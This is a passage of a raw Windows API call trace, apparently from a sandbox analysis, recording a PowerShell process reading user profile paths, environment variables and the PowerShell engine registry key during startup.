0x17 [0136.438] SetErrorMode (uMode=0x1) returned 0x1 [0136.438] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS" (normalized: "c:\\users\\adu0vk iwa5kls"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf068ee40, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0xf0dd91a0, ftLastAccessTime.dwHighDateTime=0x1d2ec02, ftLastWriteTime.dwLowDateTime=0xf0dd91a0, ftLastWriteTime.dwHighDateTime=0x1d2ec02, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.439] SetErrorMode (uMode=0x1) returned 0x1 [0136.439] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.439] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\.", nBufferLength=0x105, lpBuffer=0xcce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS", lpFilePart=0x0) returned 0x17 [0136.439] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.439] SetErrorMode (uMode=0x1) returned 0x1 [0136.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.439] SetErrorMode (uMode=0x1) returned 0x1 [0136.439] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.439] SetErrorMode (uMode=0x1) returned 0x1 [0136.440] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.440] SetErrorMode (uMode=0x1) returned 0x1 [0136.440] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.440] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop\\.", nBufferLength=0x105, lpBuffer=0xcce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.443] GetFullPathNameW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop", nBufferLength=0x105, lpBuffer=0xcd170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aDU0VK IWA5kLS\\Desktop", lpFilePart=0x0) returned 0x1f [0136.443] SetErrorMode (uMode=0x1) returned 0x1 [0136.443] GetFileAttributesExW (in: lpFileName="C:\\Users\\aDU0VK IWA5kLS\\Desktop" (normalized: "c:\\users\\adu0vk iwa5kls\\desktop"), fInfoLevelId=0x0, lpFileInformation=0xcd3d0 | out: lpFileInformation=0xcd3d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf09fade0, ftCreationTime.dwHighDateTime=0x1d2ec02, ftLastAccessTime.dwLowDateTime=0x1dbe3ff0, ftLastAccessTime.dwHighDateTime=0x1d4406f, ftLastWriteTime.dwLowDateTime=0x1dbe3ff0, ftLastWriteTime.dwHighDateTime=0x1d4406f, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0136.443] SetErrorMode (uMode=0x1) returned 0x1 [0136.444] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.487] CoTaskMemAlloc (cb=0x804) returned 0x1b825410 [0136.487] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b825410, nSize=0xcd738 | out: lpNameBuffer="AUFDDCNTXWT\\aDU0VK IWA5kLS", nSize=0xcd738) returned 0x1 [0136.487] CoTaskMemFree (pv=0x1b825410) [0136.487] CoTaskMemAlloc (cb=0x204) returned 0x14d180 [0136.487] GetUserNameW (in: lpBuffer=0x14d180, pcbBuffer=0xcd778 | out: lpBuffer="aDU0VK IWA5kLS", pcbBuffer=0xcd778) returned 1 [0136.488] CoTaskMemFree (pv=0x14d180) [0136.489] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x36ee2f8*="Available", lpRawData=0x36ee088) returned 1 [0136.490] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.490] CoTaskMemFree (pv=0x10c990) [0136.491] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.491] CoTaskMemFree (pv=0x10c990) [0136.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.713] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.713] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0136.713] CoTaskMemFree (pv=0x10c990) [0136.713] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.713] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="\\Users\\aDU0VK IWA5kLS") returned 0x15 [0136.713] CoTaskMemFree (pv=0x10c990) [0136.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.716] GetCurrentProcessId () returned 0xbf8 [0136.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.720] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd758 | out: phkResult=0xcd758*=0x38c) returned 0x0 [0136.720] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd6dc, lpData=0x0, lpcbData=0xcd6d8*=0x0 | out: lpType=0xcd6dc*=0x1, lpData=0x0, lpcbData=0xcd6d8*=0x56) returned 0x0 [0136.720] CoTaskMemAlloc (cb=0x5a) returned 0x1b80add0 [0136.720] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd6ac, lpData=0x1b80add0, lpcbData=0xcd6a8*=0x56 | out: lpType=0xcd6ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd6a8*=0x56) returned 0x0 [0136.720] CoTaskMemFree (pv=0x1b80add0) [0136.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.736] CoTaskMemAlloc (cb=0x104) returned 0x10c990 [0136.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10c990, nSize=0x80 | out: lpBuffer="") returned 0x0 [0136.736] CoTaskMemFree (pv=0x10c990) [0136.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0136.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) 